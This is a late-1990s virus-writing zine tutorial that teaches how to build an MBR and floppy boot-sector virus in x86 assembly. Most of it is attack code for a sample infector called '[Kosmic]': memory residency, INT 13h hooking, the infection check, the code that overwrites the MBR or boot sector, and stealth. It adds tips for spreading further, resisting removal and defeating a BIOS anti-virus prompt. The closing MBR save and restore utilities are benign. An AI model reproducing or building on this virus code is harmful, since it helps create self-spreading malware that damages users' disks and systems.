Your First Lesson in Boot
infection
By: Techno Phunk
-TI #1-
[Introduction]
In this lesson I will explain mbr/boot infection...bare with me because this has been sprang upon me during my learning of PE infections...and I've had little time for this thing. However, I asume that you have atleast got a GOOD idea of programing in ASM, and a bit of the tearminology involved in disks. I will give you a quick "Glossary" of terms, so that if your lost, you might get back on track. Also, if you don't have a descent understanding of ASM yet, please, read either my tutorial in "starting in ASM" or read some basic tutorials on simpler viruses...however, I see MBR/BOOT infectors much more simplistic than most File Infectors.
Note: If I made any mistakes, sorry, was in a slight hurry when I wrote it :)
--------------------------------------------------------------------------------
[Context]
MBR - Master Boot Record; loads the active partition's Boot Record
Boot Sector - The Sector on a disk, the first logical sector, that contains
the code for loading the OS which is on the disk.
Or, to tell the user that it's not a boot disk.
Partition - A devision of the Hard Disk, usualy only one...however, for
some computers, it is used so that two or more OS's can
reside on the same disk.
FAT - File Alocation Table...used by DOS to keep track of files
and their locations, etc. See another refrence for more
detail on this.
BIOS - The actual functions programed into the computer from the
start, it controls the hardware/software of the computer
and contains code for the interupts. It is loaded first
and usualy, in booting, will brag about it's creators ;).
Boot Record - Basicly, the same as boot sector, but is on HD's instead
of floppies. It is in charge of the actual loading of whatever
OS resides in that partition.
OS - Operating System; e.x: DOS, Linux, etc
TOM - Top Of Memory - usualy this is where boot virii get copied.
Sector - A sector is basicly, a small piece of the larger circular disk
it is usualy formated to 512 bytes per sector, and can easily
be accessed directly by interupts like INT 13h
[Advantages]
There are many advantages to boot viruses. Exspecialy when file infection combines with these creatures.
These are what I like to call the STD's of Computers (btw- Sexualy Transmited Deasieses).....reason: the floppy has intercorse with the CPU, and infection... heehee...o.k, a sick way to put it, but it's the truth...sorta....o.k....here's the "theory'
First we have an infected floppy....this infected floppy will infect any HD it comes in contact with, providing that the floppy is ACCIDENTALY left in the drive when to user reboots, when this happens, we drop our virus to the HD, and boom, that HD on boot will infect ANY/all floppies that enter after- -words, which, adds more carriers of this deasies to many other computers... Now, the only problem is, is that a lot of people really more on CD-ROM's and the net now-a-days....however, you'd be suprised that these things STILL spread really well....of course, we are more intrested in learning than infection, right? <G>....anyhow, if you look at the wild-list's for the last couple of years, even to this very month, you'll see that the top ten infections list is mostly boot infectors.....it's quite amusing really....
[History]
The First one (the first virus period) was Brain.Pakistani, was writen by two brothers to teach users not to be pirates of software.
Then came along STONED and Michealangelo the other two famous bugs. STONED was even (if I remember correctly)... found on Army computers back during the Gulf war of 92 (?).....anyhow, and most everyone knows about the famous Michealangelo scare.....Basicly, STONED got it all started, as it seems that about 9/10's of boot sector viruses seemed to use (as AVP calls it): the "stoned" method, I think that AVP guys just like saying "stoned" ;).
So that's our basic (very basic) history on them....so, lets get started!
[About the Boot Sector]
First of all I'll explain very quickly about your basic boot sector
The first thing that I will cover will be the BPB (Bios parameter block)...
Bios Parameter Block - Floppies (Layout)
Offset Description/what's there ---------- ------------------------- 00h Ä 02h A JMP instruction to the loading sequence 03h Ä 0Ah The name/version of the OS 0Bh Ä 0Ch Sector size in bytes 0Dh Cluster size in bytes 0Eh Ä 0Fh Sectors until the first FAT copy 10h Num of FAT copies 11h Ä 12h Num of directory entries in ROOT 13h Ä 14h Total sectors on disk (or partition) 15h Disk type (usualy 144) 16h Ä 17h FAT size (in sectors) 18h Ä 19h Sectors on cylinder (track) 1Ah Ä 1Bh Num of heads (sides) 1Ch Ä 1Fh Hidden sectors
from after 3eh to 200h is the boot code....above code doesn't have to be there however, for DOS to countinue to read the disk, it must. <g>
[ Triplets]
A Physical Sector is made by a (C,H,S) triplet. To calculate the physical sector of a triplet, use the following formula:
PS = (C+1)*(H*S)+(S-1)
[Theory Time]
O.k, so now you understand a little about why you want to code a mbr/boot infector, and a little about the disk itself. But probably not A LOT about the methods and so on of infection, and about the boot proccess. Now, I will describe what happens at boot. If you already are an expert on what happens at boot, first of all, why are you reading this, and second of all, you can move on down to the next section.
[The Boot Process]
Anyhow, basicly, when you hit that ON switch, the BIOS loads all it's code and so on into memory, and then goes to the first disk that it can find with a valid boot sector (or MBR). First, it'll check the Floppy drive, and then it will check the HD. The first disk it finds, it'll look for the BIOS Boot signiture. Which, in your virus, you must always have in the first sector (at offset 1feh). This signiture is 55aah. Don't ask where this came about, as I do not know to be honest.
So, now that it's found it's mark. It loads this sector to offset 7c00h in memory. And then proceeds to run the code within. This code usualy just loads the Kernel, and exits.
Also, know that on boot the BIOS puts the amount of memory at offset 0:413h in memory (we use this for residency in boot/mbr infection).
Most boot sectors depend on it being at offset 7c00h in memory, thus we will need to load the original boot there, and run it there, instead of just anywhere. Once we get that far.
[MBR explained]
Now, if we are on a HD, there areactualy *2* boot sectors, of sorts. One is the first to load, and is called the MBR (Master Boot Record). The MBR contains a partition table, which, it will read, and load the BOOT RECORD of the active partition.
[What A Partition is]
A partition is practicaly, a division between two sperate places. This is done so that multiple drives, or OS's can be ran off a single Hard Drive.
So, like on my computer , I have "3" Hard Drives, but in reality, it's 3 diffrent partitions on one single drive.
The Partiton table starts at 1BEh bytes from the begining, each entry is 16 bytes long. The table below asumes that this is the first partion entry.
Offset Length Meaning -------- -------- ----------- 1BEh 1 If it's 80h than this is the active partition 1BFh 3 Partition address (in triplet format) 1C2h 1 System type (FAT type- 12/16/etc) 1C3h 3 Partition end address (also in triplet format) 1C6h 4 Physical sector for beginning of this partition 1CAh 4 Partition length (in sectors)
Then, as usual, at offset 510d (1feh) you have the boot signiture.
[A bit further]
Now, the fun part. In our infection, we *could* overwrite this table, and we'd be fine, as long as the HD is what boots the computer. And we have Hard Drive Stealth enabled.
However, if a user boots from a floppy, they'll get that dreaded message "Invalid Drive Specification". In other words, they arn't going to get access to this drive. This can be good for a virus with little protection, as, it makes it a bit more difficult to disinfect. Some AV's have learned to bypass this. However, some still refuse to change, and they still have some problems with them. This also prevents a semi-not-so-dopey user from using a hex-editor or related program to restore the HD. Now, we can save the partition, very easily, as long as your willing to take more than one sector for your virus. Basicly, here's my favorite method of keeping the parition in tact (for more armored viruses, or for testing purposes: you don't want to have a trashed HD during learning, now do you?).
However, in this tutorial, I STILL want to keep this all rather simplistic. As, this tutorial is to teach you the basics, not the addons <G>. Anyhow, the basic idea, is to on infection, take the info from offset 1BEh on down to the end, and store it....And, then, when you load your virus, you load the next sector, and hook interupts then, then you may jmp to the original MBR, stored between the two, or after one. Doesn't matter.
<load the next part of our virus, and JMP to it>
org 1BEh
Stored_Partition:
db 66d dup(0)
[More on the MBR]
The MBR - First logical sector on a Hard Drive (not found on a floppy)
Anyhow. The Boot Record: stored at (0,1,1) (if only the first partition is active) is another place we *could* install the virus at. It is in better practice, however, to look at the active partition's "partition start address" field. Not the first, but the second entry. The one which contains PHYSICAL SECTOR , pass that number to our infection mechanism. Basicly, the Boot Record's purpose is to simply load the OS. The MBR is to find which OS/partition to load, and then do it. Some programs will overwrite the MBR with their own code in order to make a menu system, so the user CHOOSES which OS to boot.
[Going Deeper]
O.k, as you might have noticed, the actual FIRST used sector is at: 0/1/1 and yet, the mbr is at: 0/0/1....so, what could we use this for? Well, very simple, we can put the original MBR there, and I mean anywhere in those next 62 sectors. Yes, that's right, you have 62 sectors of space that you can store your virus/original boot too. This is very good for us :). You may want to check to make sure the sector is empty, if you wish to be obsesive, but it shouldn't be a problem. Ever. Please note that it is wise to store farther away from the MBR, and about mid point between 0/0/1 and 0/1/1...as, if you store TOO Close to either place, you may run into problems with some other programs that modify these areas.
O.k, so now you have either found that your static sectors are free....or that you have to find a new one. This is a better method IMHO, as, first of all, it won't screw up some computers that have programs like password prompts in their first couple sectors. And, AV's have to look in diffrent places to clear out the virus, as, not STATIC locations will exist, well, not really. I also recomend that as you go through looking for that empty sector. However for simplicity sakes....usualy, sectors like 0/0/4 and the like are good places to store the code. Now, if you feel so inclined to go ahead and write the code to store at diffrent locations, this is good. In this tutorial, I plan on simplicity, as I know that you are probably just learning, and not some wizard guru of ASM. So, in the examples, I will use STATIC locations.
Anyhow, So, now you have your sector your going to infect, wheter or not it's STATIC, or non-STATIC (btw- static means constant). Note, however that on floppies, you CAN NOT just write ANYWHERE, I will talk in a minute about how to infect the floppies. Anyhow, so, back to the HD.
[A closer look: Partion overwriting viruses]
Now, lets say that we are writing a partiton-overwriting virus. So, we have the following layout of the virus itself.
1st:<Virus Loader/Virus>
2nd:<original mbr>
Now, basicly, as you can see, the virus will flow like so:
Virus Loader -----. - this consist of a simple hooking procedures
| - and it also gets us in memory.
Virus ----. - will return to the MBR after execution of
| the above section.
Original MBR or Boot....
I hope your not confused by this point. It's really as simple as a TSR Overwriter ;), so it should be rather simplistic for you.
[Floppys]
O.k, and a quick word on floppies, and infecting them. This, is not much more complex than the HD infection. But you must save another Section called the BPB (Bios Parameter Block), which is stored between 03h and 3eh (first 3 bytes are a jmp over it...and are considered a part of the BPB). Also, you can't write in similar place to HD, but you can write to places liek 0/1/14 or 0/1/13...and around that neiborhood, as they are after the rood-dir entry, and unlikly to get overwriten. 0/0/10 I have seen writen to, and no problems. Have fun finding a good place. You can also can format an extra track in the disk....This is not a problem either, as there are 80 tracks on a disk, but dos only formats 79. Read in IKX#3 about this tecnique.
[Residency in BOOT]
O.k, so, how do we do all this stuff that I've been talking about? Well, it's actualy, quite simple. Basicly, the main reason a lot of people consider these infectors difficult, is because they hear the world "low level" and retreat. Well, PLEASE don't retreat, but yes, we have to go low level... But not really that low, as the nice BIOS has given us int 13h, and the low level memory alocation, is not that difficult. Now, I know that your all accustom to int 21h, dos's interupt. But, I got "bad" news for you people. only interupts numbering from 0 to 1fh are available in boot However, if we wait, we can use int 21h and others, but that has to be done later. Now then. We must start out allocating some memory. Unlike a normal file infector, you don't have to check for the virus in memory, as the virus will only be put in memory on boot. Now, we must decrease the TOM (top of memory) by how ever many Kilo-bytes that we need for the virus. For a single sector virus and two sector virus, 1k should be plenty, however, for 2+ sector viruses you may want to use 2k....Now, before we even do this, we must set up the stack. We do this like so:
Xor Ax,Ax
Mov Es,Ax
Cli
Mov Sp,7C00H
Mov Ss,Ax
Sti
First, we need to get Es=0 for the time being.
Next, we execute a Cli, which, basicly, makes it safe for us to screw with the stack for the time being. We later Cancel this command with the STI operand. We then place in the Stack Pointer, 7c00h (the offset of our code in memory). And then zero Ss...this gives us: 0000:7c00h.... Get it? not very complex at all. Now, on with it we go.
O.k, next, we have to screw with memory. This is always a fun thing to do :). Now, let me introduce you this concept a bit. Basicly, I will first do some setup.
Push Es
Pop Ds
Mov Si,Sp
Now, what this does, is first of all, set up for later when we move into memory and set DS=0
Now for decreasing available memory:
Dec Word ptr Ds:[413h]
Mov Di,Ax
Int 12H
Mov Cl,6
Shl Ax,Cl
Mov Es,Ax
O.k, that is your basic routine, now, what does it do? O.k...lets take this as much as I can, line by line.
Dec Word Ptr Ds:[413h]
This line decreases the available memory, which's value is stored in Ds:413h Remember how we set ds = 0 earlier.
Int 12H
Now, we must get the next available place for us.....The value that is stored in the BIOS segment, 0:413h is what is returned in AX....Lets see what Ralfy boy has to say about Int 12h.
Int 12h ---- - BIOS - GET MEMORY SIZE
No parameters btw.
Return: AX = kilobytes of contiguos memory starting at absolute address 00000h Note: this call returns the contents of the word at 0040h:0013h (413h); in PC and XT, this value is set from the switches on the motherboard.
- get it? GOOOOOOD
Shl Ax,6
Now, as you'll notice (here)...I dun care about 8086's...I'm tryin to be simplistic here :). As, this is a invalid op in 8086....Now, basicly I'm gonna multiply this by 3, ax = the value returned by int 12h. ;) Btw! No matter what people tell you (pointed out by Cyclone) - anything Shl Ax, ???? as long as ???? is NOT equal to one, it IS valid on the 286. Not a problem, but the code is already being writen for 286+ so, life is o.k....
Mov Es,Ax
Now, we make Es=Next place for us in memory :)
O.k, u understand so far? I hope so. Now, we must go into the Moving of the virus into memory. Now, we do a simple (very simple) move to memory.
Xor Di,Di
Mov Cx, 100h
Cld
Rep Movsw
In this example, I asume you are gonna put the WHOLE virus (whole sector) into memory. And then, I simply move it into memory. btw- 100h = 256, which multiplied by 2 is 512 (sector size)...if ya couldn't figure that one out.
Now, we may be in memory, but we need to hook some interupts. So, fun time :)
Mov Ax,Word Ptr Ds:[13H*4] ; set up our original handler
- note that Ds: (0:[????]) = pointer at IVT. 13h*4 = entry for Int 13h
- Put in AX the offst of the original handler
Mov Word Ptr Es:[Offset I13],Ax
- Put it in I13 (variable)....
Mov Ax,Word Ptr Ds:[13H*4+2]
- Put in the next word of the DWORD (double word) of the int 13h vector. This way, we get the whole original address.
Mov Word Ptr Es:[Offset I13+2],Ax
- Now, save it to the now complete, I13 (old int 13h address)
Mov Word Ptr Ds:[13H*4],Offset Handler ; hook it! :)
- Now, we place OUR handler in the old adress's place.
Mov Word Ptr Ds:[13H*4+2],Es
- go ahead and place the value of Es in there ;) (place in mem)
Now, time to go to the next place in the virus, the boot loader. We also have the virus in memory now, so life is good.
First of all, we gotta do this:
Push Es
Mov Ax,Offset Boot_Loader
Push Ax
Retf
Boot_Loader:
O.k, now we push Es, which = place in memory and then Ax for where to ret to in that place....so technically: Retunrning to: Es:Ax
Now, the above method is the COMMON method. Other viruses use exploits of the IVT (interupt Vector Table) (using backdoors). Another would be to copy self into VIDEO ram, and then, when DOS loads, go into the HMA (the last two are 100% compat with win95).
The method above will cause flags with winblows. Also, in order to use int 13h, we must call the original that we hooked, as, win95 trys to disable it. But we have the original anyhow, so we can use it :). No need in deleting HSFLOP.pdr or other tricks. However to work around the MBR changed or modified message, you must of course, try to wait for windows, and hook int 13h then, so that your HD stealth works ;)
[Loading Original Boot]
Now, then, we are now off to the boot sector or MBR, but first, we must descide which one (since we are a floppy/mbr infector). Now, lets say that we have stored our original MBR in sector: 0/0/3, and on a floppy, we saved the original boot in 0/1/13 (one less than the most common 0/1/14). Anyhow, here's how we'd go about this:
Xor Ax,Ax ; reset drive (func=0 int=13)
Call Int13H
First we must reset the drive, you can be obsesive about it, and do it as recomened: 3 times, but 1 time usualy works, expecialy on more modern machines. Anyhow, read RB's for more info on this bug. But, basicly, we just use func=0 of int 13h.
Mov Es,Ax ; Es=0
Mov Ax,201H ; Func=2 of Int=13h (Read Abs Sector)
Mov Bx,7C00H ; Bx= 7c00h (where to read)
Cmp Dl,80H ; Is HD?
Mov Cx,03h ; Well, sector 3
Mov Dh,0 ; head 0
Jae Mbr_Loader ; Hard drive? yes, so load it as a HD
Mov Cl,13 ; Nah, it's a floppy prolly, so load from
Mov Dh,1 ; sector 13, head 1
Mbr_Loader:
Call Int13H ; call original int13h
Db 0Eah
Dw 7C00H ; jump to boot sector which, we READ into
Dw 0 ; memory at offset: 0000:7c00h earlier :)
Now, the fun part, I get to explain this. O.k, basicly first of all, I set up for a read of the boot sector. And I set the buffer (place for the data to go) to offset: 0:7c00h....why? duh! ;) the offset that is asumed for boot sector code. I want my host to run normaly, right? :). O.k, now then Next, I must find out if I'm a hd or not. Basicly, first, I will do a CMP of register DL and the value 80h. Next, I set up as if I'm gonna do it to a HD. However, I then make that VITAL descision: is it truly a HD?....Now, I do this by JAE Mbr_Loader. Now, what's that mean? Well, o.k, if 80h is in DL, that means that we are reading the FIRST hard drive, if 81h, the SECOND hard drive. *NOT* partition, etc, but the ACTUAL physical, second hard drive. Now, I JAE instead of JE because I want to infect the other HD's too, if they exist. So, on with this. Now, if I was ABOVE or EQUAL to 80h, then I go on, call INT 13h, and JMP to the memory location of original boot. Now, if I wasn't above or equal, then I must change for the floppy section. So, I make it change Cl to 13 and Dh to 1. And countinue as above. Simple eh? Well, now comes the handlers. But these are not hard at all my kids.
[Stealth]
Now, a stealth routine (since we are a overwriter of the partition, we gotta have it)...plus, this adds some "armor" to your virus...quite simple routine.
Stealth:
Mov Cx,3 ; move pointer of read to the original BS
Mov Ax,201H
Cmp Dl,80H ; check if we are on HD
Jae HD_Stealth ; yes, so just go ahead and do it
Mov Cl,13
Mov Dh,1 ; no, adjust for floppy (0/1/14)
Hd_Stealth:
Call Int13H ; stealth
Jmp Exit
- prety much self explanitory.
[The Handler of Int 13h]
Handler:
Cmp Cx,1
Jne Blah
Cmp Ah,2
Jne Blah
Cmp Dh,0
Jne Blah
Jmp Infectcion
Blah:
db 0eah ; execute the int 13h.
I13 Dd 0h ; this gets overwriten with the original int 13h address.
O.k, this isn't REAL worthy of explanation, but I'll explain in detail anyhow. I want to make sure you understand this concept TOTALY by the end of this tutorial. O.k, first of all, I want to check from Least likly, to Most likly. I basicly am going to save some time, as, it'll exit faster, if it's not really what I want. Other wise, I'm fine. So, next will be the Infection routine, or rather the TRY_TO infect routine. Heh.....if disk is locked, sorry, no can do, but good news! We dun have to worry about that nasty int 24h handler in int 13h :). Now then, it's time for even more fun. Heehee....It's time for the INFECTION muhahahaha. Btw- Blah comes later on. (just cuz I felt like doing that <G>)
[Infection Check]
Infection:
Call Int13H ; make the read happen...
Jc Blah ; Error? get out of here - write protect, etc.
Pushf ; push flags
Pusha ; agian, only a 286+ instruction...screw it :)
Cmp Word Ptr Es:[Bx + Offset Marker],'K[' ; check for infection
- I note that this explains a BIT of explanation.
alright, first of all, I call the int 13h (original (so we don't get in an infinate loopey ;)), and, if I get an error (carry flag is set), then, life sucks, and I exit out. Otherwise, I want to push flags (so the original caller get everything right)...and also a push of all registers.
Now, the part that I "should" explain. The CMP. This is basicly, our infection check...very short, and sweet, but, it works. Now, it's in reverse word format. So the string is actualy:
btw- BX is where in memory the Sector is located :)
Marker Db '[Kosmic] By: Techno Phunk',0
but, we only worry about the [K, and, since we are in the funky language ASM, we must do this CMP in reverse word order. :). O.k, simple enough?
Je Stealth
- and stealth the read if infected :)
[Infection Time]
Push Es
Push Ds
Pop Es ; switch es and ds
Pop Ds
Mov Si,[Bx+03h] ; start at 03h
Mov Di,[boot_info] ; put it in boot_info
Mov Cx,1eh ; this many bytes * 2
Rep Movsw
Push Es ; put the registers back where they belong.
Push Ds
Pop Es
Pop Ds
- Now, the above routine, is a simple way to save the BPB (after the 3 byte jump, the next 3eh bytes on a floppy, it is vital to keep the floppy readable by dos.) Si = place to read from....Di = place to put it.
Cmp Dl,80H ; check for HD
Jae MbrInfect
- if Dl=80h or more, then it's a HD of some kind.
Mov Cx,13 ; get it, else we go for floppy agian
Mov Dh,1
- this place, is, of course, our Floppy infection.
Jmp Infect_Flop
- avoid the HD routine :)
MBRInfect:
Mov Cx,3
Xor Dh,Dh
Infect_Flop:
Mov Ax,301H ; write original BS to either 0/0/3 or 0/1/13
Call Int13H ; Call original handler - see note
Jc Exit ; error, exit
- o.k, basicly, we are now gonna write the data in BX (original BS) to our storage place, for now.
Push Cs Pop Es
- We need to switch some regs around now.
push es ds
pop es ds
Mov Ax,301H ; write virus
Mov Cx,1
Xor Bx, Bx
Xor Dh,Dh
Call Int13H
- This virus will now be writen :)
[Exiting]
Exit: Popa Popf Retf 2
- I basicly, now, want to pop everything that I have saved...and RETF... back to our moronic people :)
Int13H: Pushf Call Dword Ptr Cs:[I13] Ret
- the above routine will actualy, make us "win95 compatible" in that, we can easily infect...no problem, but, we are still lacking, as the MBR CHANGED message will still apear. Basicly, we use this, in order to avoid infinite loops, and things like this. It calls our original INT 13h.
Marker Db '[Kosmic] By: Techno Phunk',0
-bascily our marker.
Org 510d
- last two bytes...BIOS signiture.
Dw 0aa55h
- yay!
End:
End
[The End - to some extent]
Now then, the above sample codes, are just a basic layout, I'm not even sure if it works, if you where to compile it all together and assemble, however it SHOULD work, if you do. I will not put it all together nice & neat, as if you followed it all, you should understand to go without a nice & neat virus example. It should all be coming together. So, read this a few hundred times, and by then, I'll have the multiparite tutorial ready for ya! :)))
Btw- Lets talk about the above method of infection, just a bit. I have added this at the last moment. Anyhow, the above method is only ONE of the *many* methods to infect a mbr/boot. One way, if you look at the partition format, you will notice that we can EASILY create a partition for ourselfs, and then, make it the active one. This way, we gain control without messing with the mbr itself. nice eh? just implement it, and have fun! Just be sure not to screw over the partition table that already exists. Also, you can as I already mentioned, infect the boot record on a HD. Have fun!
[Appendix A]
So, what next?
Basicly, you can add a MORE win95 friendly routine, or you can even do some of the following:
* well, you can try to jump to multiparites * you can add some encryption (encryption in boot is done like an overwriter) * you can add polymorphism.... * or, you can always add more devios ways of spreading <G>
One way to spread better is to infect the HD if your running from a floppy drive. You do this by a simple READ of the MBR, with the int 13h...not with a CALL int13h....nooo, the ACTUAL interupt. This (since virus is in memory) will infect the disk. Also, another way is to actualy make an infection routine in the boot_loader. All this must be done in the boot_loader, and be sure you are infecting from a floppy. See my Gabey.boot virus for a little idea.
Also, you may want to add suport for AMI BIOS anti-virus switch, by simply using int 16h to put a Y in the keyboard buffer, everytime you write to the MBR. Whatever....use yer imagination!!!! :)
[Appendix B]
Now the fun part! <g>
Get out a blank disk and type: format a: /s/u This will create a blank, boot disk for us
Now, get a copy of a program that saves and restores boot sectors, partition tables, and mbr's. TBAV comes with some nice programs like TBUTIL. I have included a program to save your mbr, and partiton table. Just in case your infector screws yer HD...Copy over Diskedit or some other diskeditor, to the disk, and Copy over the programs: sys.com, fdisk.exe, format.com, and anything else that you might need incase something bad happens.... this is just looking on the worst side, it is not likly that you will need this, but do it for goodness sake...be sure to copy restore.com and the boot.cap file...you only need the boot.cap from your HD...don't worry about the floppy.
Here is that program to save your boot sector (or mbr) to a file: boot.cap I will include an entire kit for saving data off disks in later files of this mag. This is just a quick something I wipped up, but it does work well...I used this to gather a sample of the dos boot sector in order to dissasemble it
-[save.asm]-------------------------------------------------------------------
; a86 save.asm
Code Segment
Assume Cs:code,Ds:code,Es:code
Start:
Mov Cx,3 ; recomended to reset at least 3 times.
Blar:
Xor Ax,Ax ; Reset Disk Sub-System
Int 13h ; Int 13h - Disk Interupt.
Jnc Read ; If no error, go ahead and read.
Loop Blar ; ooh, error, better try agian.
Read: ; o.k, I ready to rock.
Mov Cx,3
Read_Loopy:
Push Cx
Mov Ax,201h ; function (ah=02) for read, al=01 for reading one time
Xor Dx,Dx ; Head = 0
Mov Dl, 80h ; Drive = First HD.
Mov Cx,1 ; Sector uno.
Mov Bx, Offset Buffer; where to put all this info...
Int 13h ; Int 13h, disk services
Jnc Next ; Was no error, Go ahead and save.
Pop Cx ; Need CX back, for loop.
Loop Read_Loopy ; Keep goin :(
Jmp Exit ; your time is up, and it's time to die.
Next:
Mov Ah,9
Lea Dx,Msg
Int 21h
Mov Ax,3c00h ; create file :)
Xor Cx,cx
Lea Dx,Blah ; file name....dunno why I'm explaning this, you should
Int 21h ; know most of this.
Xchg Bx,Ax ; save file handle, and zero ax at the same time..
Mov Ah,40h ; write the boot sector to file: boot.cap
Mov cx,200h ; 200h = 512 decimal (sector size :))
Lea Dx,Buffer
Int 21h
Mov Ah,3eh ; close file
Int 21h
Exit:
Int 20h ; exit
Blah Db 'BOOT.CAP',0
Buffer Db 200h dup (?) ; for saving boot sector in
msg db 'MBRSave V.1.0 (c) 1998 By: Techno Phunk / TI',13,10
db 'Now Saving MBR to File...$'
code ends
end start
Now...for a program to restore the boot/mbr (or partition) from the above program...
; a86 restore.asm
Code Segment
Assume Cs:code,Ds:code,Es:code
Start:
Mov Ah,9
Lea Dx,msg
Int 21h
Mov Ax,3D02h ; open existing file: boot.cap for read/write access
Lea Dx,File_Name
Int 21h
Xchg Bx,Ax ; put file handle in bx
Mov Ah,3fh
Mov Cx,200h ; read 512 bytes
Mov Dx,offset Buffer ; where to read the stuff to
Int 21h
Mov Ah,3eh ; close file ;)
Int 21h
Mov Cx,3 ; 3 chances to reset drive.
Blar: ; HD prolly don't need this as much as floppy...
Xor Ax,Ax ; I keeping it here incase you want to modify for floppys
Int 13h ; Do it!
Jnc Write ; we're fine
Loop Blar ; life sucks.
Jmp Done ; *REALY* sux0rs :)
Write:
Mov Cx,3 ; at least 3 tries.
Write_Loopy:
Push Cx
Mov Ax,0301h ; write the data in "buffer" (old boot sector)
Sub Dx,Dx ; to the disk using service 3 of int 13h to write
Mov Dl,80h
Mov Cx,1 ; original MBR at 0/0/1, agian
Mov Bx, Offset Buffer
Int 13h
Pop Cx
Jnc Done ; life was fine
Loop Write_Loopy ; life sucked
Done:
Int 20h ; you know this.
msg db 'MBRSave V.1.0 (c) 1998 By: Techno Phunk / TI',13,10
db 13,10,'Now Restoring MBR to HD...$'
buffer db 200h dup (?)
file_name db 'BOOT.CAP',0
code ends
end start
Note: the above programs are use-at-your-own-risk, I am not responsible if they don't work...but I know they do...atleast on my DOS 6.22 system/win 3.1 386 I use it all the time, so it should work...unless you have the disk write protected or something ;) Once you have compleated the saving of the mbr and you have the boot disk, test it, by rebooting onto that disk (leave it in the drive)...it should bring you dirrectly to a dos prompt...if you get "non-system disk" or whatever, umm...sys a: from dos prompt should fix it ....once it is working and you have everything on the disk, write protect it to protect from accidental infection (which would be bad) - note: these may not work for win95 computers (atleast not the writing), so if in doubt, BE SURE....I will not be held responsible if things go wrong!!!!!
- Techno Phunk -